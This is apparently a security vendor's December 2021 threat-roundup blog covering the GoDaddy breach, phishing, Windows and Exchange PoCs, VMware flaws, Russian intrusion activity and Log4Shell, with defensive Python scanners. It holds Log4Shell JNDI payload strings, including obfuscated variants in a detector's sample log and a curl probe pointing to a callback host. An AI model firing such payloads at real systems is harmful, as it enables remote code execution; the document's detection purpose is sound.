Top Middle East Cyber Threats – 13 December 2021
At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.
In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:
GoDaddy Data Breach Impacts 1.2 Million WordPress Site Owners
On November 22, Internet infrastructure company GoDaddy disclosed that an attacker had gained access to the personal information of up to 1.2 million customers of its Managed WordPress hosting service.
The subsequent investigation found that the attacker had access to its environment since at least September 6, 2021, more than two months before the intrusion was discovered.
Based on current evidence, GoDaddy said the hacker gained access to the following information:
- The email addresses and customer numbers of up to 1.2 million active and inactive Managed WordPress customers.
- The original WordPress Admin password that GoDaddy issued to customers when a site was created.
- The sFTP and database usernames and passwords for active customers.
- The SSL private key for a subset of active customers.
GoDaddy said it has already reset the sFTP and database passwords exposed in the breach, and has reset the WordPress admin password for customers who were still using the default one GoDaddy issued when their sites were created.
RECOMMENDATIONS
- If you use GoDaddy's Managed WordPress hosting, reset every password associated with the service: the WordPress admin account, sFTP, databases and control panels.
- Change the passwords of any other personal or corporate accounts on which the same password was reused.
- Monitor for abnormal access, such as logins outside working hours or from outside the country.
- Investigate any suspicious change, such as a replaced SSL certificate, modified website source code or the presence of unknown files. Treat any certificate whose private key was exposed as compromised and have it reissued.
- Initiate digital forensics and incident response (DFIR) to detect any unauthorized access or malicious activity.
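The last two recommendations are much easier to act on when there is a known-good baseline to compare against. The script below is added here as an illustration and is not GoDaddy's or WordPress's tooling: it snapshots the SHA-256 of every file under a web root, stores the baseline outside the web root, and reports files that were added, modified or removed. The web root and baseline paths and the sample site tree are constructed assumptions, and the demo tampers with the tree to show what a dropped file, an edited theme and a deleted file look like in the diff.

```python
"""Baseline-and-diff integrity check for a WordPress web root.

Added example for this post, not GoDaddy or WordPress tooling. Snapshot the
site while it is known good, keep the baseline outside the web root, and
diff later to find dropped web shells or edited theme/plugin source.
All paths and the sample file tree below are constructed for the demo.
"""
import hashlib
import json
import os
import tempfile


def sha256_file(path):
    """Stream the file so large uploads do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root):
    """Map 'relative/path' -> sha256 for every regular file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = sha256_file(full)
    return result


def save_baseline(root, baseline_path):
    """Write the known-good snapshot. Keep baseline_path OUTSIDE the web root
    (ideally off-host): an attacker who can write to the site could otherwise
    rewrite the baseline as well."""
    with open(baseline_path, "w") as fh:
        json.dump(snapshot(root), fh, indent=1, sort_keys=True)


def diff_against_baseline(root, baseline_path):
    """Return {'added': [...], 'modified': [...], 'removed': [...]}."""
    with open(baseline_path) as fh:
        old = json.load(fh)
    new = snapshot(root)
    return {
        "added": sorted(p for p in new if p not in old),
        "modified": sorted(p for p in new if p in old and new[p] != old[p]),
        "removed": sorted(p for p in old if p not in new),
    }


def _write(root, rel, body, mode="w"):
    """Helper for the constructed demo tree."""
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, mode) as fh:
        fh.write(body)


def demo():
    """Build a constructed mini web root, baseline it, tamper with it, diff it."""
    root = tempfile.mkdtemp(prefix="wp-root-")
    baseline = os.path.join(tempfile.mkdtemp(prefix="wp-baseline-"), "baseline.json")
    _write(root, "wp-config.php", "<?php define('DB_NAME', 'wp'); ?>")
    _write(root, "wp-content/themes/twentytwentyone/functions.php", "<?php // theme code ?>")
    _write(root, "wp-content/uploads/2021/12/logo.png", "not-really-png")
    save_baseline(root, baseline)          # taken while the site is known good
    # Simulated post-breach changes: a PHP file dropped into uploads, a line
    # injected into the theme, and a deleted config file.
    _write(root, "wp-content/uploads/2021/12/x.php", "<?php /* unexpected */ ?>")
    _write(root, "wp-content/themes/twentytwentyone/functions.php",
           "\n// injected\n", mode="a")
    os.remove(os.path.join(root, "wp-config.php"))
    return diff_against_baseline(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

On a real site, run `save_baseline` right after a clean install or a verified restore and schedule `diff_against_baseline` from a host that the web server cannot write to; PHP files appearing under wp-content/uploads are the classic sign of a dropped shell.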
Public Holidays Expected to Witness Surge in Phishing and Scams
Multiple phishing cases targeting customers in the Financial and Retail sectors have been reported to Help AG recently.
Cybercriminals use major events as lures. Public holidays bring a surge in online shopping and payments, which gives attackers both a plausible pretext and a large pool of engaged targets for collecting financial information, so phishing and scam activity gains momentum around them. As in previous years, a similar surge is expected this season.
Increases are expected in the following categories:
- Credential phishing
- Malware (especially trojans capable of harvesting credentials, downloading and executing other malware)
- Phishing for banking details
- Phishing for e-payment details
- Phishing impersonating e-commerce websites
RECOMMENDATIONS
- Perform user awareness campaigns.
- Provide a hotline and an email address through which users can report suspicious messages or a possible compromise of their credentials or organizational assets, and make sure users know that the channel exists and why reporting matters.
Windows Zero-Day and Exchange RCE PoCs Disclosed Publicly
Researchers have published proof-of-concept (PoC) exploits on GitHub for two vulnerabilities, one of which is still unpatched.
The first PoC targets CVE-2021-42321, which affects on-premises Exchange Server 2016 and Exchange Server 2019 (including servers used by customers in Exchange Hybrid mode).
Successful exploitation allows an authenticated attacker to execute code remotely on a vulnerable Exchange server.
CVE-2021-42321 was fixed in Microsoft's November 2021 Patch Tuesday release.
The second PoC exploits CVE-2021-41379, which exists in the Windows Installer service. An attacker can abuse the service to delete a file or directory, escalate privileges and execute arbitrary code in the context of SYSTEM.
Microsoft's fix for this vulnerability was incomplete: after examining the patch, the researcher found a new zero-day privilege elevation vulnerability that bypasses it.
The publicly released PoC grants SYSTEM privileges on Windows 10, Windows 11 and Windows Server.
RECOMMENDATIONS
- Install November patches and keep systems up to date.
- For CVE-2021-41379, keep tracking Microsoft's upcoming patches and install the fix as soon as it is released. In the meantime, the public PoC binary can be detected when it is downloaded and used unmodified by adding the following hashes to your monitoring list (MD5: f317b6bafb5c6f4c3c9ffb967fd941b5; SHA256: 9e4763ddb6ac4377217c382cf6e61221efca0b0254074a3746ee03d3d421dabd). A recompiled or repacked copy will not match these hashes, so treat them as a quick win rather than as coverage.
- Restrict endpoint access to file-sharing and code-hosting services such as Google Drive, OneDrive, Dropbox, GitHub, GitLab and Pastebin, which are frequently used to stage tooling like this PoC.
- Enable software restriction policies and application whitelisting.
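The hash check in the CVE-2021-41379 recommendation above, as a script. This is added here and is not Microsoft's or Help AG's tooling: it computes MD5 and SHA-256 in a single pass per file and matches either digest against the list. The two hashes come from the post; the scanned directory and the sample files are constructed for the demo.

```python
"""Sweep a directory tree for files whose MD5 or SHA-256 matches a known-bad
hash list, seeded with the CVE-2021-41379 PoC binary hashes quoted above.

Added example for this post, not a Microsoft or Help AG tool. Both digests
are computed in one streaming pass per file. The scanned directory and the
sample files are constructed; only the two PoC hashes come from the post.
"""
import hashlib
import os
import tempfile

# Hashes of the public CVE-2021-41379 PoC binary, as listed in the post above.
IOC_HASHES = {
    "f317b6bafb5c6f4c3c9ffb967fd941b5",                                  # MD5
    "9e4763ddb6ac4377217c382cf6e61221efca0b0254074a3746ee03d3d421dabd",  # SHA-256
}


def digests(path):
    """Return (md5_hex, sha256_hex) for path, reading it once in 1 MiB chunks."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()


def sweep(root, iocs=IOC_HASHES):
    """Return [(path, md5, sha256)] for every file under root matching an IOC hash."""
    wanted = {h.strip().lower() for h in iocs}   # tolerate upper-case hash lists
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                md5, sha256 = digests(path)
            except OSError:
                continue   # locked or unreadable file; log it in a real sweep
            if md5 in wanted or sha256 in wanted:
                hits.append((path, md5, sha256))
    return hits


def demo():
    """Constructed tree: a benign file plus a stand-in 'sample.exe' whose hash is
    added to the list at run time, so the demo shows a miss and a hit offline."""
    root = tempfile.mkdtemp(prefix="ioc-sweep-")
    benign = os.path.join(root, "readme.txt")
    sample = os.path.join(root, "tools", "sample.exe")
    os.makedirs(os.path.dirname(sample))
    with open(benign, "w") as fh:
        fh.write("nothing to see here\n")
    with open(sample, "wb") as fh:
        fh.write(b"MZ constructed stand-in, not the real PoC\n")
    page_hits = sweep(root)                                   # page hashes only: no match
    extended = IOC_HASHES | {digests(sample)[1].upper()}      # add the constructed file
    extended_hits = sweep(root, extended)
    return ([os.path.relpath(p, root) for p, _, _ in page_hits],
            [os.path.relpath(p, root) for p, _, _ in extended_hits])


if __name__ == "__main__":
    print(demo())
```

Point `sweep` at user profile, Downloads and temp directories first, where a downloaded PoC is most likely to land, and feed the same hash list to your EDR so that execution is blocked rather than merely found after the fact.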
VMware vCenter Server Updates Address Two Vulnerabilities
VMware issued an advisory to address two vulnerabilities in VMware vCenter Server (vCenter Server) and VMware Cloud Foundation (Cloud Foundation).
The first, CVE-2021-21980, is an arbitrary file read vulnerability in the vSphere Web Client with a CVSSv3 base score of 7.5.
A malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information.
The second, CVE-2021-22049, with a CVSSv3 base score of 6.5, is a Server-Side Request Forgery (SSRF) vulnerability in the vSAN Web Client (vSAN UI) plug-in of the vSphere Web Client (FLEX/Flash).
A malicious actor with network access to port 443 on vCenter Server may exploit this issue to make vCenter Server send requests to URLs outside vCenter Server or to internal services.
VMware released updates to remediate both vulnerabilities.
RECOMMENDATIONS
- Install the patches listed in VMSA-2021-0027 and keep systems up to date.
Russian Threat Actors Targeting Government Entities Globally
Researchers continue to track multiple clusters of suspected Russian intrusion activity targeting businesses and governments worldwide. A recent assessment divides the activity into two distinct clusters, UNC3004 and UNC2652, both of which are associated with UNC2452 (tracked by Microsoft as Nobelium).
Since 2020, one of the most common tactics has been the compromise of technology solution providers, service providers and resellers, whose access is then used to reach their downstream customers. The actors have also used credentials obtained from a third party's info-stealer malware campaign to gain initial access to organizations. As reported for Q1 2021, accounts holding Application Impersonation privileges were used to harvest sensitive mail data. Other tactics include:
- the use of residential IP proxy services and newly provisioned, geolocated infrastructure to interact with victims;
- novel TTPs to circumvent security restrictions within environments, such as extracting virtual machines to determine internal routing configurations;
- a new, tailor-made downloader that researchers call CEELOADER;
- abuse of multi-factor authentication "push" notifications on smartphones, repeatedly sending prompts until the user accepts one.
In most cases, post-compromise activity included theft of data relevant to Russian interests. In some cases, the data theft appears to have been conducted primarily to create new routes into other victim environments.
RECOMMENDATIONS
- Make efforts to increase visibility through endpoint detection, response, and logging. Endpoint monitoring tools are critical for detecting suspicious activity in an environment after other controls have been circumvented.
- Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
- Ensure that systems are correctly configured and that the security features are enabled.
- Develop risk management and cyber hygiene practices for third parties or managed service providers (MSPs) that your organization relies on.
- Use Multi-Factor Authentication (MFA) for all services, especially webmail, virtual private networks, and accounts that access critical systems, to the extent possible.
- Block the indicators of compromise within respective security controls organization wide.
Critical Vulnerability (aka Log4Shell) Affecting Apache Log4j2
Log4j2 is an open-source, Java-based logging library maintained by the Apache Software Foundation and embedded in a very large number of Java applications and services, including many Apache projects (it is not part of the Apache HTTP Server, which is written in C). A critical vulnerability, CVE-2021-44228 (CVSS score 10/10, also known as "Log4Shell"), affecting the Log4j2 library was reported, prompting the project to release several fixes and code revisions. Active exploitation in the wild has been observed as of today. The vulnerability affects all Log4j2 versions from 2.0-beta9 through 2.14.1.
Efforts to address CVE-2021-44228 produced at least two releases containing fixes. According to industry sources, the first release candidate (Log4j2 2.15.0-rc1) was insufficient because its fix could be bypassed to achieve RCE; Log4j2 2.15.0-rc2, the basis of the final 2.15.0 release, is recommended as of December 10, 2021. Reports indicate that the exploit is trivial, and both internal and external data sources show a massive increase in traffic carrying scanning and exploitation attempts in the form of JNDI/LDAP lookup strings.
JNDI (Java Naming and Directory Interface), which provides an abstract interface to naming and directory services such as DNS and LDAP, is the mechanism through which the vulnerability is exploited.
Log4j2 does not sufficiently sanitize user-supplied data: an attacker can submit a string that Log4j2 interprets as a lookup variable, and when that string is expanded, a remote Java class file is loaded and invoked. Whether a given service is exploitable depends on how it uses Log4j2, specifically on whether attacker-controlled input reaches a logged message or parameter (a User-Agent header, a username, a search query). The JNDI/LDAP URL in the lookup points to a malicious Java class object that is deserialized and invoked on the victim host, compromising the target. This is possible because JNDI imposes no security controls on LDAP requests and an LDAP reference can point at a remote codebase from which classes are loaded. Publicly available tools such as marshalsec can generate the required exploit payloads.
According to a blog post, the LDAP remote-class-loading vector does not work on JDK versions newer than 6u211, 7u201, 8u191 and 11.0.1, because in those versions com.sun.jndi.ldap.object.trustURLCodebase defaults to false and JNDI will not load remote code over LDAP. A newer JDK is not a substitute for patching, however: the lookup still fires, which is enough for data exfiltration through the DNS or LDAP request itself, and deserialization gadgets already on the classpath can still be reached. This critical vulnerability in Apache Log4j has affected popular products, including VMware and Oracle offerings.
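To show how the lookup syntax described above appears in practice and how to spot it, here is a small detector, added for this post and not part of any vendor tooling, that runs over web server access lines, URL-decodes them, collapses the nesting and case-conversion lookups attackers use to hide the string (${${lower:j}ndi:...}, ${::-j}), and flags any remaining ${jndi: lookup regardless of provider (ldap, rmi, dns), which generalizes the LDAP case discussed above. The log lines are constructed, and the 198.51.100.0/24 addresses are a documentation range.

```python
"""Flag Log4Shell (CVE-2021-44228) probe strings in web server access logs.

Added example for this post, not a Help AG or vendor tool. Attackers rarely
send the literal ${jndi:ldap://...}; they URL-encode it and wrap pieces in
nested lookups such as ${lower:j} or ${::-j} that Log4j would resolve before
the jndi lookup runs. This detector undoes both layers, then matches any
${jndi: lookup whatever the provider. SAMPLE_LOG is constructed; the
198.51.100.0/24 addresses are a documentation range.
"""
import re
import urllib.parse

# Innermost ${...} lookup: a body with no nested braces.
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")
# What we ultimately look for, once obfuscation is collapsed.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

SAMPLE_LOG = [
    '198.51.100.7 - - [12/Dec/2021:09:14:01 +0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain payload in the User-Agent
    '198.51.100.23 - - [12/Dec/2021:09:14:05 +0400] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    # URL-encoded payload in a query parameter
    '198.51.100.23 - - [12/Dec/2021:09:14:09 +0400] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    # nested-lookup obfuscation of the same payload
    '198.51.100.23 - - [12/Dec/2021:09:14:12 +0400] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.23/a}"',
    # a lookup that is not jndi: must not fire
    '198.51.100.9 - - [12/Dec/2021:09:15:00 +0400] "GET /?template=${date:yyyy} HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]


def _resolve(match):
    """Replace one obfuscation lookup with the literal it would expand to."""
    body = match.group(1)
    if body.strip().lower().startswith("jndi:"):
        return match.group(0)          # the real payload: keep it for the final match
    if ":-" in body:                   # ${env:NOPE:-j} and ${::-j} both yield "j"
        return body.split(":-", 1)[1]
    if ":" in body:                    # ${lower:j}, ${upper:N}, ${date:yyyy} -> argument
        return body.split(":", 1)[1]
    return ""                          # bare ${name} with no argument


def deobfuscate(text):
    """URL-decode twice (double encoding is common) and collapse nested lookups."""
    for _ in range(2):
        text = urllib.parse.unquote(text)
    previous = None
    while previous != text:            # repeat until no innermost lookup changes
        previous = text
        text = LOOKUP_RE.sub(_resolve, text)
    return text


def scan_log(lines):
    """Return [(line_number, decoded_line)] for lines carrying a JNDI lookup."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        decoded = deobfuscate(raw)
        if JNDI_RE.search(decoded):
            hits.append((number, decoded))
    return hits


if __name__ == "__main__":
    for number, line in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (number, line))
```

Access logs only show probes that arrived over HTTP; the same `deobfuscate` step applies to any field a Java service logs (usernames, form fields, headers forwarded by a proxy), so run it over application logs too, and treat any hit whose callback host you do not recognise as an exploitation attempt against that service.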
Mitigation steps:
- Upgrade log4j to the latest version.
- For Log4j versions 2.10 through 2.14.1, set the system property log4j2.formatMsgNoLookups=true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true) to disable message lookups.
- For Log4j versions 2.7 and later, you can disable lookups in the pattern layout by writing the message as %m{nolookups} instead of %msg or %m in your log pattern.
- Many modern applications use Logback as the logging backend instead of Log4j (even when log4j-api is used as the facade). In those cases the vulnerable log4j-core library is not on the classpath, but verify this by inspecting the dependency tree rather than assuming it.
RECOMMENDATIONS
- Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
- Ensure that systems are correctly configured and that the security features are enabled.
- Log4j 1.x is end-of-life and no longer supported; to receive security fixes, upgrade to Log4j 2. Vulnerabilities in Log4j 1.x reported after August 2015 were not checked and will not be fixed.
- In Apache Log4j2 versions up to and including 2.14.1, the JNDI features used in configuration, log messages and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. When message lookup substitution is enabled, an attacker who controls log messages or log message parameters can execute arbitrary code loaded from LDAP servers. Use Log4j 2.15.0 or later, in which the Apache team has disabled this behavior by default.
- Evaluate the different ways Log4j may have been installed; the location of a matching JAR file often identifies the application that is potentially vulnerable. On Windows, for example, a file at C:\Program Files\ApplicationName\log4j-core-<version>.jar indicates that ApplicationName must be investigated. On Linux, lsof shows which processes currently have the JAR open: lsof /path/to/log4j-core-<version>.jar
- Limit outbound connections from affected servers to trusted hosts and protocols to prevent the vulnerable Java service from downloading a malicious class file via LDAP.
- Review the official VMware (VMSA-2021-0028) and Oracle notifications and deploy the necessary patches as soon as possible.
- Patch log4j or disable the format message lookup if running a vulnerable version.
- Run vulnerability assessment and penetration testing (VAPT) scans to identify vulnerable systems. A PoC check looks like curl -H 'X-Api-Version: ${jndi:ldap://<callback host you control>/a}' <target URL>, where the angle-bracketed parts are placeholders; exploitability is confirmed when your callback host receives an LDAP connection from the target. Any header or parameter the application logs (User-Agent, X-Forwarded-For, form fields) can carry the probe, so test more than one.
- Isolate third-party applications running the vulnerable versions.
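The JAR-location step in the recommendations above can be automated. The script below is added here and is not an Apache or Help AG tool: it walks a directory tree for log4j-core JARs, reads the version from the JAR manifest (falling back to the file name), classifies it against the version ranges this post gives as of 10 December 2021 (an assumption to update as new releases appear), and notes whether the JndiLookup class that implements the ${jndi:...} lookup is present. The JARs built by the demo are constructed stand-ins, not real Log4j.

```python
"""Locate log4j-core JARs on disk and triage their version against the ranges
in this post: 2.0-beta9 through 2.14.1 vulnerable, 2.15.0-rc1 bypassable,
2.15.0 fixed (advisory state as of 10 December 2021; later releases may
change this, so treat classify() as an assumption to keep updated).

Added example for this post, not an Apache or Help AG tool. The JARs that
demo() builds are constructed stand-ins, not real log4j.
"""
import os
import re
import tempfile
import zipfile

JAR_NAME_RE = re.compile(r"^log4j-core-(\d[\w.\-]*)\.jar$", re.IGNORECASE)
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([a-z]+)(\d*))?$", re.IGNORECASE)
# Class that implements the ${jndi:...} lookup in log4j-core.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.0-beta9' -> ((2, 0, 0), 'beta', 9); '2.14.1' -> ((2, 14, 1), '', 0)."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised log4j version: %r" % text)
    nums = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    return nums, (m.group(4) or "").lower(), int(m.group(5) or 0)


def classify(version):
    """Map a log4j-core version to the categories used in this post."""
    nums, tag, num = parse_version(version)
    if nums[0] != 2:
        return "unsupported"             # 1.x is end-of-life: migrate, there is no patch
    if nums == (2, 0, 0) and tag == "beta" and num < 9:
        return "outside-advisory-range"  # betas before 2.0-beta9 are not listed as affected
    if nums < (2, 15, 0):
        return "vulnerable"
    if nums == (2, 15, 0) and tag == "rc" and num == 1:
        return "bypassable"              # the 2.15.0-rc1 fix could be bypassed
    return "fixed"                       # 2.15.0-rc2 / 2.15.0 and later, per the post


def inspect_jar(path):
    """Return (version or None, has_jndi_lookup_class) for one JAR."""
    version = None
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        has_jndi = JNDI_CLASS in names
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            for line in manifest.splitlines():
                if line.lower().startswith("implementation-version:"):
                    version = line.split(":", 1)[1].strip()
                    break
    if version is None:                  # manifest missing or stripped: use the file name
        m = JAR_NAME_RE.match(os.path.basename(path))
        version = m.group(1) if m else None
    return version, has_jndi


def scan(root):
    """Walk root; return [(path, version, status, has_jndi_lookup_class)]."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not JAR_NAME_RE.match(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                version, has_jndi = inspect_jar(path)
            except zipfile.BadZipFile:
                findings.append((path, None, "unreadable", None))
                continue
            status = classify(version) if version else "unknown-version"
            findings.append((path, version, status, has_jndi))
    return findings


def demo():
    """Constructed tree with three stand-in JARs; returns {file name: (version, status, jndi)}."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)
    with zipfile.ZipFile(os.path.join(lib, "log4j-core-2.14.1.jar"), "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\nImplementation-Version: 2.14.1\r\n")
        zf.writestr(JNDI_CLASS, b"")                 # class present, as in a real 2.14.1
    with zipfile.ZipFile(os.path.join(root, "log4j-core-2.15.0.jar"), "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n")  # no version: name fallback
        # JndiLookup.class deliberately omitted in this stand-in so the flag is exercised
    with open(os.path.join(lib, "log4j-core-2.13.0.jar"), "wb") as fh:
        fh.write(b"not a zip file")                  # corrupt download must not crash the scan
    return {os.path.basename(p): (v, s, j) for p, v, s, j in scan(root)}


if __name__ == "__main__":
    for item in sorted(demo().items()):
        print(item)
```

Fat JARs, WARs and shaded builds embed the log4j classes under other file names and are missed by a name-based walk; for those, open every zip-like archive on the host and look for the JndiLookup class path instead, and confirm each hit against the running process with lsof as described above.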
References:
- Help AG Threat Intelligence Team
- https://www.sec.gov/Archives/edgar/data/1609711/000160971121000122/gddyblogpostnov222021.htm
- https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/
- https://www.bleepingcomputer.com/news/security/exploit-released-for-microsoft-exchange-rce-bug-patch-now/
- https://www.vmware.com/security/advisories/VMSA-2021-0027.html
- https://www.mandiant.com/resources/russian-targeting-gov-business
- https://logging.apache.org/log4j/2.x/security.html
- https://www.randori.com/blog/cve-2021-44228/
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/